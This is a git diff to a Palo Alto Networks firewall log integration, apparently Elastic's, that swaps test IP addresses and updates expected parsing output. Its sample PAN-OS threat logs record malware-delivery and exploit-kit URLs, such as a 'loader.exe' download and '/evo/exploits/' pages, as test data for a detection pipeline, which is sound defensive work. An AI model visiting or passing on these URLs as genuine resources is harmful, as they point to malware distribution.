16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 diff --git a/packages/panw/changelog.yml b/packages/panw/changelog.yml index b137a2a3196..deb834ec225 100644 --- a/packages/panw/changelog.yml +++ b/packages/panw/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log index 421c6f796a6..36604b7b0e2 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log @@ -31,4 +31,4 @@ Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json index 82c3153546a..b8d4ac9e903 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json @@ -12,7 +12,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081338075Z", + "ingested": "2021-12-09T13:42:57.366911400Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,CONFIG,0,0,2012/02/25 00:51:50,192.168.0.2,,set,admin,Web,Succeeded, config shared local-user-database user badguy,0,0x0", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -41,7 +41,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081376999Z", + "ingested": "2021-12-09T13:42:57.366915600Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:22,192.168.0.2,,set,admin,Web,Succeeded, config mgt-config users badguy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -70,7 +70,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081389770Z", + "ingested": "2021-12-09T13:42:57.366922Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:40,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -99,7 +99,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081400341Z", + "ingested": "2021-12-09T13:42:57.366928400Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:53:53,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -128,7 +128,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081410710Z", + "ingested": "2021-12-09T13:42:57.366932800Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:53:56,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -157,7 +157,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081421040Z", + "ingested": "2021-12-09T13:42:57.366937100Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:54:16,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -186,7 +186,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081431415Z", + "ingested": "2021-12-09T13:42:57.366942Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,ras,0,2012/02/25 00:54:16,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -215,7 +215,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081441683Z", + "ingested": "2021-12-09T13:42:57.366946400Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:17,192.168.0.2,,edit,badguy,Web,Succeeded, vsys vsys1 profiles url-filtering monzyspolicy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -244,7 +244,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081452123Z", + "ingested": "2021-12-09T13:42:57.366950100Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:36,192.168.0.2,,commit,badguy,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -273,7 +273,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081462922Z", + "ingested": "2021-12-09T13:42:57.366955Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:57:49,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -302,7 +302,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081479442Z", + "ingested": "2021-12-09T13:42:57.366959500Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:57:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -331,7 +331,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081491732Z", + "ingested": "2021-12-09T13:42:57.366964400Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,routing,0,2012/02/25 00:58:12,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -360,7 +360,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081502396Z", + "ingested": "2021-12-09T13:42:57.366968300Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,vpn,0,2012/02/25 00:58:12,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -389,7 +389,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081512809Z", + "ingested": "2021-12-09T13:42:57.366973100Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,ras,0,2012/02/25 00:58:12,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -418,7 +418,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081523206Z", + "ingested": "2021-12-09T13:42:57.366979100Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,1,2012/02/25 00:58:14,,unknown,,0,0,general,informational,Config installed,909,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -447,7 +447,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081533705Z", + "ingested": "2021-12-09T13:42:57.366986600Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,0,2012/02/25 00:59:36,,general,,0,0,general,informational,Log type config cleared by user badguy ,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -476,7 +476,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081544298Z", + "ingested": "2021-12-09T13:42:57.366992800Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,general,1,2012/04/10 03:11:57,,unknown,,0,0,general,informational,Config installed,884,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -505,7 +505,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081554745Z", + "ingested": "2021-12-09T13:42:57.366998700Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:11:56,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -534,7 +534,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081565139Z", + "ingested": "2021-12-09T13:42:57.367003500Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,vpn,0,2012/04/10 03:11:56,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -563,7 +563,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081576853Z", + "ingested": "2021-12-09T13:42:57.367008400Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,routing,0,2012/04/10 03:11:56,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -592,7 +592,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081587851Z", + "ingested": "2021-12-09T13:42:57.367014400Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:06:11,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -621,7 +621,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081598239Z", + "ingested": "2021-12-09T13:42:57.367018900Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/10 03:06:00,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -650,7 +650,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081608557Z", + "ingested": "2021-12-09T13:42:57.367023800Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,general,1,2012/04/09 09:02:53,,unknown,,0,0,general,informational,Config installed,840,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -679,7 +679,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081619146Z", + "ingested": "2021-12-09T13:42:57.367029900Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:02:52,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -708,7 +708,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081629540Z", + "ingested": "2021-12-09T13:42:57.367034600Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:02:52,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -737,7 +737,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081640004Z", + "ingested": "2021-12-09T13:42:57.367039600Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/09 09:02:52,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -766,7 +766,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081650479Z", + "ingested": "2021-12-09T13:42:57.367044500Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:00:55,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -795,7 +795,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081660804Z", + "ingested": "2021-12-09T13:42:57.367050400Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:00:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -824,7 +824,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081671110Z", + "ingested": "2021-12-09T13:42:57.367054600Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:35,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -853,7 +853,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081682326Z", + "ingested": "2021-12-09T13:42:57.367059600Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20,192.168.0.2,,edit,admin,Web,Succeeded, vsys vsys1 profiles data-objects PII,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -882,7 +882,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081693413Z", + "ingested": "2021-12-09T13:42:57.367065600Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -911,7 +911,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081703939Z", + "ingested": "2021-12-09T13:42:57.367070500Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -940,7 +940,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081714479Z", + "ingested": "2021-12-09T13:42:57.367076200Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -961,27 +961,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1000,7 +999,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1034,7 +1033,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "community_id": "1:CpnxxiYk2GolQXL1AiyOIq2jeIE=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1072,14 +1071,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:37:00.081727444Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:42:57.367080500Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log index b493a709848..a21b1c1c97a 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log @@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 